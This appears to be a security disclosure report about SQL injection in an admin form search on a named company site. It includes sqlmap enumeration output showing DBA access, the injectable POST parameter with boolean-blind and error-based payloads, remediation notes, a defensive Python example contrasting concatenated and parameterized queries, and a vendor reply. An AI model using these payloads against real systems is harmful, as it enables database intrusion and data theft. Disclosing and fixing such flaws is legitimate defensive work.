[20:10:43] [INFO] fetching current user
[20:10:43] [INFO] resumed: sa
current user: 'sa'
[20:10:43] [INFO] fetching current database
[20:10:43] [INFO] resumed: super8db
current database: 'super8db'
[20:10:43] [INFO] testing if current user is DBA
current user is DBA: True
database management system users [4]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] myportal
[*] sa
database management system users password hashes:
available databases [9]:
[*] master
[*] model
[*] msdb
[*] ReportServer$SQL2008
[*] ReportServer$SQL2008TempDB
[*] su8
[*] super8db
[*] super8dbTest
[*] tempdb
Database: su8
+------------------------------+---------+
| Table | Entries |
+------------------------------+---------+
| dbo.ecs_admin_log | 8503 |
| dbo.ecs_region | 3430 |
| dbo.My_Quality | 2701 |
| dbo.My_Sup_Order | 1692 |
| dbo.My_Owners | 1252 |
| dbo.ecs_users | 1225 |
| dbo.Sheet2 | 594 |
| dbo.Sheet2_bak20141230 | 517 |
| dbo.My_Integral_log | 511 |
| dbo.Sheet2_bak20140820 | 426 |
| dbo.My_DepArticle | 398 |
| dbo.My_ProductsInfo | 385 |
| dbo.Sheet2_bak20130701 | 378 |
| dbo.Sheet | 347 |
| dbo.SheetBak20121231 | 347 |
| dbo.ecs_attribute | 216 |
| dbo.My_ProductsInfo_Photos | 213 |
| dbo.ecs_article | 189 |
| dbo.ecs_article_bak | 188 |
| dbo.ecs_order_action | 179 |
| dbo.My_Complaints | 179 |
| dbo.ecs_shop_config | 170 |
| dbo.ecs_admin_action | 153 |
| dbo.ecs_admin_comparison | 111 |
| dbo.ecs_goods | 92 |
| dbo.ecs_order_goods | 78 |
| dbo.ecs_vote_option | 76 |
| dbo.ecs_order_info | 74 |
| dbo.My_SubFile | 74 |
| dbo.View_users_order | 70 |
| dbo.View_order_goods_list | 61 |
| dbo.ecs_article_cat | 59 |
| dbo.View_order_integral | 58 |
| dbo.ecs_goods_attr | 53 |
| dbo.My_Article_TitImg | 46 |
| dbo.ecs_ad | 42 |
| dbo.ecs_goods_gallery | 42 |
| dbo.ecs_account_log | 41 |
| dbo.My_Suppliers | 39 |
| dbo.xy_region | 39 |
| dbo.ecs_member_price | 38 |
| dbo.ecs_feedback | 37 |
| dbo.View_user_message | 37 |
| dbo.ecs_volume_price | 33 |
| dbo.ecs_ad_position | 31 |
| dbo.ecs_vote_log | 30 |
| dbo.My_DepUser | 23 |
| dbo.ecs_admin_user | 22 |
| dbo.ecs_exchange_goods | 19 |
| dbo.My_Products | 19 |
| dbo.ecs_area_region | 17 |
| dbo.ecs_category | 17 |
| dbo.ecs_mail_templates | 17 |
| dbo.View_shipping | 17 |
| dbo.ecs_admin_message | 16 |
| dbo.My_Weighted | 15 |
| dbo.View_exchange_goods | 15 |
| dbo.ecs_delivery_goods | 14 |
| dbo.ecs_shipping | 14 |
| dbo.My_Departments | 14 |
| dbo.My_Supply_for | 14 |
| dbo.ecs_brand | 13 |
| dbo.ecs_goods_cat | 13 |
| dbo.My_WScore | 13 |
| dbo.View_WScore_Print | 13 |
| dbo.ecs_delivery_order | 12 |
| dbo.ecs_vote | 12 |
| dbo.ecs_goods_type | 11 |
| dbo.ecs_shipping_area | 11 |
| dbo.ecs_shipping_area_expand | 11 |
| dbo.ecs_user_address | 10 |
| dbo.Global_Settings | 10 |
| dbo.ecs_pay_log | 8 |
| dbo.My_QAph | 8 |
| dbo.ecs_comment | 7 |
| dbo.ecs_goods_activity | 7 |
| dbo.View_comment | 7 |
| dbo.ecs_tag | 6 |
| dbo.ecs_user_bonus | 6 |
| dbo.My_DepArticleCat | 6 |
| dbo.View_tag_manage | 6 |
| dbo.ecs_ad_index | 5 |
| dbo.ecs_kill_goods | 5 |
| dbo.ecs_role | 5 |
| dbo.ecs_snatch_log | 5 |
| dbo.View_user_snatch_log | 5 |
| dbo.ecs_bonus_type | 4 |
| dbo.ecs_payment | 4 |
| dbo.ecs_user_account | 4 |
| dbo.My_Annual_Rules | 4 |
| dbo.My_Hotel_type | 4 |
| dbo.Shop_Email | 4 |
| dbo.ecs_cat_recommend | 3 |
| dbo.ecs_goods_activity_0 | 3 |
| dbo.ecs_products | 3 |
| dbo.ecs_suppliers | 3 |
| dbo.My_Sup_Evaluation | 3 |
| dbo.View_My_Comments | 3 |
| dbo.ecs_booking_goods | 2 |
| dbo.ecs_cart | 2 |
| dbo.ecs_goods_activity_1 | 2 |
| dbo.ecs_goods_article | 2 |
| dbo.ecs_pack | 2 |
| dbo.ecs_package_goods | 2 |
| dbo.ecs_user_rank | 2 |
| dbo.My_Grading_Results | 2 |
| dbo.View_booking_goods | 2 |
| dbo.ecs_favourable_activity | 1 |
| dbo.ecs_friend_link | 1 |
| dbo.ecs_goods_activity_2 | 1 |
| dbo.ecs_group_goods | 1 |
| dbo.ecs_kill_user | 1 |
| dbo.ecs_link_goods | 1 |
| dbo.My_Annual_Rate | 1 |
| dbo.My_Buy_for | 1 |
| dbo.My_Rating_header | 1 |
| dbo.My_Score_results | 1 |
+------------------------------+---------+


Custom form management (search)

http://mys8.super8.com.cn:81/pages/bn/form/bn_formmanage.aspx (POST)
__EVENTTARGET=ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$btnQuery&__EVENTARGUMENT=&__VIEWSTATE=…&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery
$txtWatermarked=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery
$TextBoxWatermarkExtender1_ClientState=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$cbAllowPaging=on&ctl00
$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$hfOrdering=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$Ord
er=rbtnDescend&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$lbOrderingYes=State&ctl00$ctl00$ContentPlaceHold
er1$ContentPlaceHolder2$lbOrderingYes=TheOrder&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$hfAdvancedQuer
y=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtFormName=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlace
Holder2$txtDescription=2&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucCreateTime$scLeft=2015-07-
28&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucCreateTime$scRight=2015-08-
11&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucLastModifyTime$scLeft=2015-08-
05&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucLastModifyTime$scRight=2015-08-
06&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtCreateUserName=3&ctl00$ctl00$ContentPlaceHolder1$Content
PlaceHolder2$txtLastModifyUserName=4&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder
$scLeft=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder
$scRight=5&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ddlState=


ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery$txtWatermarked is vulnerable to injection
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery
$txtWatermarked
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: __EVENTTARGET=ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$btnQuery&__EVENTARGUMENT=&__VIEWSTATE=…&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder
2$wtxtAdvancedQuery$txtWatermarked=1%' AND 9113=9113 AND '%'='&ctl00$ctl00$Conte
ntPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery$TextBoxWatermarkExtender1_C
lientState=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$cbAllowPaging=on
&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$hfOrdering=&ctl00$ctl00$Con
tentPlaceHolder1$ContentPlaceHolder2$Order=rbtnDescend&ctl00$ctl00$ContentPlaceH
older1$ContentPlaceHolder2$lbOrderingYes=State&ctl00$ctl00$ContentPlaceHolder1$C
ontentPlaceHolder2$lbOrderingYes=TheOrder&ctl00$ctl00$ContentPlaceHolder1$Conten
tPlaceHolder2$hfAdvancedQuery=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolde
r2$txtFormName=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtDescript
ion=2&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucCreateTime$scLeft=20
15-07-28&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucCreateTime$scRigh
t=2015-08-11&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucLastModifyTim
e$scLeft=2015-08-05&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucLastMo
difyTime$scRight=2015-08-06&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$
txtCreateUserName=3&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtLastM
odifyUserName=4&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder$s
cLeft=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder$scRight=5
&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ddlState=
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __EVENTTARGET=ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$btnQuery&__EVENTARGUMENT=&__VIEWSTATE=…

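Proof of vulnerability:

As above.

Remediation:

Change the back-end admin password
Change the permissions
Prevent injection

Copyright notice: when reposting, please credit the source 路人甲@乌云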
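
The payloads in the sqlmap output above (`…%' AND … AND '%'='`) close a quoted `LIKE '%…%'` pattern, which points to the search text being concatenated into the SQL string. As an added example (not code from the report or the vendor), the Python block below contrasts that pattern with a parameterized query; it uses SQLite so that it runs offline instead of the SQL Server back end named in the output, and the table, columns, rows and function names are hypothetical.

```python
import sqlite3

# Constructed sample rows; the table and column names are hypothetical.
ROWS = [("survey 1", "admin"), ("100% feedback", "admin"), ("notes", "ops")]

# Boolean probe as shown in the sqlmap output, and the same shape with the
# condition made false, to compare the two responses.
TRUE_PROBE = "1%' AND 9113=9113 AND '%'='"
FALSE_PROBE = "1%' AND 9113=9114 AND '%'='"


def make_db():
    """Build an in-memory database holding the constructed rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE form_list (form_name TEXT, create_user TEXT)")
    db.executemany("INSERT INTO form_list VALUES (?, ?)", ROWS)
    return db


def search_concatenated(db, term):
    """Vulnerable pattern (assumed): user text is pasted into the SQL string."""
    sql = ("SELECT form_name FROM form_list "
           "WHERE form_name LIKE '%" + term + "%' ORDER BY rowid")
    return [row[0] for row in db.execute(sql)]


def escape_like(term, esc="\\"):
    """Escape LIKE wildcards so user text only ever matches literally."""
    return (term.replace(esc, esc + esc)
                .replace("%", esc + "%")
                .replace("_", esc + "_"))


def search_parameterized(db, term):
    """Hardened pattern: the term travels as a bound parameter, never as SQL."""
    sql = ("SELECT form_name FROM form_list "
           "WHERE form_name LIKE ? ESCAPE '\\' ORDER BY rowid")
    return [row[0] for row in db.execute(sql, ("%" + escape_like(term) + "%",))]


if __name__ == "__main__":
    db = make_db()
    for label, fn in (("concatenated ", search_concatenated),
                      ("parameterized", search_parameterized)):
        # Concatenated: the two probes return different row sets, which is the
        # true/false signal a boolean-based blind test relies on.
        # Parameterized: both probes are plain text and match nothing.
        print(label, "true probe :", fn(db, TRUE_PROBE))
        print(label, "false probe:", fn(db, FALSE_PROBE))
        print(label, "normal '1' :", fn(db, "1"))
```

Parameterization addresses the "prevent injection" item only; the `sa` connection shown in the output falls under the separate "change the permissions" item.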


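Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 13

Confirmation time: 2015-08-31 12:11

Vendor reply:

This system is still in the testing phase. Thank you very much for the notice.

Latest status:

None yet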